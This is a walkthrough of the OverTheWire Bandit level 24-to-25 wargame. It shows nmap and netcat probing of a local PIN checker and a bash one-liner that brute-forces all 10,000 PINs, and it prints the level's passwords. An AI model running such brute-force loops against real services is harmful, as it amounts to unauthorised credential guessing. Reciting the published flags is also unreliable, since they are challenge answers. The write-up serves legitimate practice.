Bandit Level 24 → 25
Login: ssh bandit24@bandit.labs.overthewire.org -p 2220
Password: gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8
task
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
theory lil bit
- Process Enumeration: Using
ps aux | grephelps identify background services or processes running under specific user accounts. - Port Scanning:
nmapis used to verify if a specific port onlocalhostis actually open and listening. - Manual Interaction: Before writing a script, it's crucial to connect to the service manually (using
nc) to understand exactly what input format the program expects and what output it gives. - Brute-Forcing with Loops: A bash
forloop combined with brace expansion{0000..9999}is the fastest way to generate all possible 4-digit PINs. Piping (|) this massive output directly intoncautomates the attack.
my approach / solution
1. Reconnaissance:
First, I wanted to see if there were any obvious processes running for bandit25.
bandit24@bandit:~$ ps aux | grep bandit25
I also poked around /var/run to see if there were any interesting socket or PID files, but didn't find anything immediately useful for this challenge.
2. Verifying the Port:
I knew from the prompt that a service was on port 30002. After a quick typo with an nmap flag, I scanned the port locally to confirm it was up and listening as pago-services2.
bandit24@bandit:~$ nmap localhost -p 30002
Starting Nmap 7.94SVN ...
PORT STATE SERVICE
30002/tcp open pago-services2
3. Manual Testing:
Before writing any scripts, I connected manually to see what the daemon actually wanted. First, I just piped the password, but it failed. Then, I connected interactively and typed a few random guesses (0 0 0 0, 0 0 0 1) to see how it handled bad inputs.
bandit24@bandit:~$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
0 0 0 0
Wrong! Please enter the correct current password and pincode. Try again.
4. The Brute-Force Attack:
Once I understood the format (<password> <pin>), I wrote a one-liner bash for loop to generate all numbers from 0000 to 9999. I echoed the password alongside the generated PIN and piped the entire 10,000-line stream directly into the netcat connection.
bandit24@bandit:~$ for i in {0000..9999}; do echo "gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8 $i"; done | nc localhost 30002
5. Catching the Flag: The script fired off thousands of attempts in seconds. The terminal flooded with "Wrong!" messages until it finally hit the correct PIN, breaking the loop with the success message:
Wrong! Please enter the correct current password and pincode. Try again. Correct! The password of user bandit25 is iCi86ttT4KSNe1armKiwbQNmB3YJP3q4
<!-- truncate -->
